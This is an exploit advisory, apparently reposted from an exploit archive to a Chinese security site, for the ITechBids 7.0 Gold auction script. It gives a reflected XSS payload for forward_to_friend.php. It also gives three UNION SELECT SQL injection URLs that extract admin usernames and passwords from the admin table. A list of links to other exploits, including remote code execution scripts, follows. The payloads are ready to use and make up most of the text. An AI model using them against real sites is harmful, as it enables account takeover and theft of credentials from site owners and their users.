ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

所属分类: 网络安全 / Exploit 阅读数: 177
收藏 0 赞 0 分享
######## ## ## ###### ######## ## ## ######## ######## ####### ########
## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## #### ## ## ## ## #### ## ## ## ## ## ##
###### ## ## ## ## ######## ## ######## ## ####### ## ##
## ## #### ## ## ## ## ## ## ## ## ##
## ## ### ## ## ## ## ## ## ## ## ## ## ##
######## ## ## ###### ## ## ## ## ## ####### ########

################################ !R4Q!4N H4CK3R ###################################

ITechBids 7.0 Gold Multiple Remote Vulnerabilities

Website : http://www.itechscripts.com

Founded By : Encrypt3d.M!nd

NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.


# 1- Cross-site scripting (XSS):

Affected File : forward_to_friend.php

PoC :

/forward_to_friend.php?productid=<script>alert(666);</script>


# 2-Remote Sql Injection(s) :

Affected File(s) :

sellers_othersitem.php
classifieds.php
shop.php

Note:There is Other Files Affected But I Couldn't Exploit Them :(

PoC:

/sellers_othersitem.php?seller_id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/classifieds.php?productid=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/shop.php?id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin


# Greetz:

MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
KoRn The Dog,Mini-Spider,All My Friends


The EnD :D
更多精彩内容其他人还在看

Maian Search

-[*] ================================================================================ [*]- -[*] Maian Search <= v1.1 Insecur
收藏 0 赞 0 分享

Maian Weblog

-[*] ================================================================================ [*]- -[*] Maian Weblog <= v4.0 Insecu
收藏 0 赞 0 分享

Maian Guestbook

-[*] ================================================================================ [*]- -[*] Maian Guestbook <= 3.2 Insec
收藏 0 赞 0 分享

Maian Recipe

-[*] ================================================================================ [*]- -[*] Maian Recipe <= v1.2 Insecu
收藏 0 赞 0 分享

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

<?php ## ## Name: Fuzzylime 3.01 Remote Code Execution Exploit ## Credits: Charles "real" F. <charlesfol[a
收藏 0 赞 0 分享

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

--== ================================================================================ ==-- --== jSite 1.0 OE Multiple Remot
收藏 0 赞 0 分享

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

==================================================================== Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
收藏 0 赞 0 分享

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

############################################################### #################### Viva IslaM Viva IslaM #################### ##
收藏 0 赞 0 分享

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

#!/usr/bin/perl #!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!! #after i noticed that there was a prob
收藏 0 赞 0 分享

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

#!/usr/bin/php <?php ## ## Fuzzylime 3.01 Remote Code Execution ## Credits: Inphex and real ## ## [C:]# php fuzzylime.p
收藏 0 赞 0 分享
查看更多